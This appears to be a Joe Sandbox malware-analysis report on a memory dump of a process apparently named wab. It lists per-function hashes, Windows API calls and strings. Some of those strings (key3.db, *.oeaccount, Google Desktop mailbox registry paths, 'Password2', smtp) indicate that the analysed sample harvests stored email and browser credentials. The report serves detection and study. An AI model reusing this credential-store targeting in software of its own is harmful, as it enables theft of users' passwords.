                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                  • String ID:
                                                                                  • API String ID: 4247780290-0
                                                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                    • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                    • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                    • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                    • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                  • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                  • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                  • String ID:
                                                                                  • API String ID: 2374668499-0
                                                                                  • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                  • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                  • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                  • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040AD5B
                                                                                  • memset.MSVCRT ref: 0040AD71
                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                  • sprintf.MSVCRT ref: 0040ADA8
                                                                                  Strings
                                                                                  • <%s>, xrefs: 0040ADA2
                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                  • API String ID: 3699762281-1998499579
                                                                                  • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                  • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                  • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                  • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                                                                  • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                  • Opcode Fuzzy Hash: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                                                                  • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                                                                    • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                                                                  • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                  • Opcode Fuzzy Hash: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                                                                  • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                    • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                    • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                  • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                  • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                  • String ID:
                                                                                  • API String ID: 2775283111-0
                                                                                  • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                  • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                  • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                  • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                  • API String ID: 885266447-2471937615
                                                                                  • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                  • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                  • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                  • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                  • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                    • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                                                                    • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                  • String ID: Ul@$key3.db
                                                                                  • API String ID: 1968906679-1563549157
                                                                                  • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                  • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                  • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                  • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcmpi$_mbscpy
                                                                                  • String ID: smtp
                                                                                  • API String ID: 2625860049-60245459
                                                                                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                  • memset.MSVCRT ref: 00408258
                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                  Strings
                                                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$EnumOpenmemset
                                                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                  • API String ID: 2255314230-2212045309
                                                                                  • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                  • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C28C
                                                                                  • SetFocus.USER32(?,?), ref: 0040C314
                                                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FocusMessagePostmemset
                                                                                  • String ID: S_@$l
                                                                                  • API String ID: 3436799508-4018740455
                                                                                  • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                  • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004092C0
                                                                                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                  • _mbscpy.MSVCRT ref: 004092FC
                                                                                  Strings
                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileString_mbscpymemset
                                                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                  • API String ID: 408644273-3424043681
                                                                                  • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                  • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                  • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                  • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy
                                                                                  • String ID: C^@$X$ini
                                                                                  • API String ID: 714388716-917056472
                                                                                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                  • String ID: MS Sans Serif
                                                                                  • API String ID: 3492281209-168460110
                                                                                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_strcmpimemset
                                                                                  • String ID: edit
                                                                                  • API String ID: 275601554-2167791130
                                                                                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strlen$_mbscat
                                                                                  • String ID: 3CD
                                                                                  • API String ID: 3951308622-1938365332
                                                                                  • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                  • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscat$_mbscpy
                                                                                  • String ID: Password2
                                                                                  • API String ID: 2600922555-1856559283
                                                                                  • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                  • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                  • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                  • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                  • API String ID: 2574300362-543337301
                                                                                  • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                  • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                  • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                  • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: rows deleted
                                                                                  • API String ID: 2221118986-571615504
                                                                                  • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                  • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                  • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                  • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 3384217055-0
                                                                                  • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                  • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                  • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                  • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$memset
                                                                                  • String ID:
                                                                                  • API String ID: 1860491036-0
                                                                                  • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                  • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 368790112-0
                                                                                  • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                  • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                  • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                  • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 368790112-0
                                                                                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • __allrem.LIBCMT ref: 00425850
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                  • __allrem.LIBCMT ref: 00425933
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
